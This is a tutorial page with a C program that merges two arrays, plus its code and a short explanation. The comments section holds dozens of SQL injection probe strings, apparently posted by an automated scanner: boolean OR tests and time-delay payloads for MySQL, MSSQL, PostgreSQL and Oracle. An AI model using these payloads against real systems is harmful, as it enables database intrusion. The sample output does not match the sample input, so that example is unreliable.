C Program to Merging two arrays
Get two arrays and merge them into single array.
Sample Input 1:
3 5 4 2 4 9 7 6 3
Sample Output 1:
5 4 2 9 7 6 3
Program or Solution
#include<stdio.h>
#include<stdlib.h>
int main()
{
int *a,*b,*c,n,m,i,j;
printf("Enter the sizes of two arrays:");
scanf("%d %d",&n,&m);
a=malloc(sizeof(int)*n);
b=malloc(sizeof(int)*m);
c=malloc(sizeof(int)*(n+m));
printf("Enter %d elements for first array:",n);
for(i=0;i<n;i++)
{
scanf("%d",&a[i]);
}
printf("Enter %d elements for Second array:",m);
for(i=0;i<m;i++)
{
scanf("%d",&b[i]);
}
i=0;
for(j=0;j<n;j++)
{
c[i]=a[j];
i++;
}
for(j=0;j<m;j++)
{
c[i]=b[j];
i++;
}
printf("After Merging:");
for(i=0;i<n+m;i++)
{
printf("%d ",c[i]);
}
return 0;
}
Program Explanation
Create a new array with size of size of a array + size of b array.
C[n+m] visit elements of a array and store it in c.
c[i]=a[j] i++ visit elements of b array and store it in c.
c[i]=b[j] i++
Comments
ubaTaeCJ
-1 OR 2+257-257-1=0+0+0+1 --ubaTaeCJ
-1 OR 3+257-257-1=0+0+0+1 --ubaTaeCJ
-1 OR 3*2<(0+5+257-257) --ubaTaeCJ
-1 OR 3*2>(0+5+257-257) --ubaTaeCJ
-1 OR 2+99-99-1=0+0+0+1ubaTaeCJ
-1 OR 3+99-99-1=0+0+0+1ubaTaeCJ
-1 OR 3*2<(0+5+99-99)ubaTaeCJ
-1 OR 3*2>(0+5+99-99)ubaTaeCJ
-1' OR 2+171-171-1=0+0+0+1 --ubaTaeCJ
-1' OR 3+171-171-1=0+0+0+1 --ubaTaeCJ
-1' OR 3*2<(0+5+171-171) --ubaTaeCJ
-1' OR 3*2>(0+5+171-171) --ubaTaeCJ
-1' OR 2+413-413-1=0+0+0+1 or '68Gs3mxD'='ubaTaeCJ
-1' OR 3+413-413-1=0+0+0+1 or '68Gs3mxD'='ubaTaeCJ
-1' OR 3*2<(0+5+413-413) or '68Gs3mxD'='ubaTaeCJ
-1' OR 3*2>(0+5+413-413) or '68Gs3mxD'='ubaTaeCJ
-1" OR 2+373-373-1=0+0+0+1 --ubaTaeCJ
-1" OR 3+373-373-1=0+0+0+1 --ubaTaeCJ
-1" OR 3*2<(0+5+373-373) --ubaTaeCJ
-1" OR 3*2>(0+5+373-373) --ubaTaeCJ
if(now()=sysdate(),sleep(15),0)ubaTaeCJ
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'ZubaTaeCJ
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"ZubaTaeCJ
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ubaTaeCJ
-1; waitfor delay '0:0:15' --ubaTaeCJ
-1); waitfor delay '0:0:15' --ubaTaeCJ
1 waitfor delay '0:0:15' --ubaTaeCJ
Z1PAyZGC'; waitfor delay '0:0:15' --ubaTaeCJ
-5 OR 420=(SELECT 420 FROM PG_SLEEP(15))--ubaTaeCJ
-5) OR 560=(SELECT 560 FROM PG_SLEEP(15))--ubaTaeCJ
-1)) OR 15=(SELECT 15 FROM PG_SLEEP(15))--ubaTaeCJ
8uDeUJXe' OR 648=(SELECT 648 FROM PG_SLEEP(15))--ubaTaeCJ
HK4rYIrt') OR 661=(SELECT 661 FROM PG_SLEEP(15))--ubaTaeCJ
TVUdAPTh')) OR 529=(SELECT 529 FROM PG_SLEEP(15))--ubaTaeCJ
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)ubaTaeCJ
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'ubaTaeCJ
1'"ubaTaeCJ
@@EqB9aRelated Programs
- C Program to get and print the array elements
- C Program to find the sum of array elements
- C Program to find the sum and average of array Elements
- C Program to Search an Element in an array
- C Program to find Largest element in the array
- C Program to find Smallest element in the array
- C Program to print all the numbers which are less than given key element from a given array.
- C Program to find Second Largest element in the array
- C Program to find Second smallest element in the array
- C Program to delete an element in an array
- C Program to Reverse the Elements in array
- C Program to reverse the first half of array elements
- C Program to reverse the second half of array elements
- C Program to Sort the Elements in ascending order
- C Program to Sort the Elements in descending order
- C Program to sort half of the Array elements in ascending order and next half in descending order
- C Program to replace every element with the greatest element on right side
- C Program to perform circular Array Rotation
- C Program to add two matrix
- C Program to multiply two matrix
- C Program to transpose the Matrix
coming Soon
coming Soon